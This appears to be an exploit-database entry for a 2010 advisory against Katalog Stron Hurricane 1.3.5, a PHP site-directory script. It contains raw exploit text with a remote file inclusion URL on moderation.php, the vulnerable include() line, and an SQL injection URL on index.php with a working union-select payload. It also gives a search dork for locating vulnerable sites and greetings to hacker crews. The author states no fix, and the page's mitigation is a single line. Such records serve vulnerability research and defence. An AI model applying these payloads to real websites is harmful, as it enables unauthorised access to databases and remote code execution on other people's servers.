Katalog Stron Hurricane Multiple Vulnerability RFI / SQL

vendor:

Katalog Stron Hurricane

by:

kaMtiEz

7,5

CVSS

HIGH

RFI/SQL

94, 89

CWE

Product Name: Katalog Stron Hurricane

Affected Version From: 1.3.5

Affected Version To: 1.3.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Katalog Stron Hurricane Multiple Vulnerability RFI / SQL

The vulnerability exists due to the inclusion of user-supplied data in the includes_directory parameter of the 'moderation.php' script without proper sanitization. This can be exploited to include arbitrary files from remote web servers and execute arbitrary SQL commands via the 'get' parameter of the 'index.php' script.

Mitigation:

Input validation should be used to prevent the inclusion of user-supplied data in the includes_directory parameter of the 'moderation.php' script.

Source

Exploit-DB raw data:

#############################################################################################################
## Katalog Stron Hurricane Multiple Vulnerability RFI / SQL			                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 14 February, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.katalog.hurricane.pl/
[+] Download : http://www.katalog.hurricane.pl/download.html
[+] version : 1.3.5 or lower maybe also affected
[+] Vulnerability : RFI
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Here We go .. Live From Jogja City.. ]

[ RFI ]

http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDONESIANCODER]


[ BUG ]

[!] moderation.php
     include($includes_directory.'population.php');

[ SQL ]

http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER]

[ XPL ]

6666+union+all+select+1,database(),3--

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,Ibl13Z,Milo
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Ibl13Z : Turut berduka atas Flashdisknya gan
[+] Milo : Telpon MyQueen Terosss hhaa
[+] r3m1ck : KAYAK KUWEK Ojo Homok Yak .. ndak baik
[+] gonzhack : gua doain bro moga balikan .. hha ..
[+] for some one .. one day .. u will be mind .. >.<

[ QUOTE ]

[+] we are NOT DEAD INDONESIANCODER STILL r0x
[+] nothing secure ..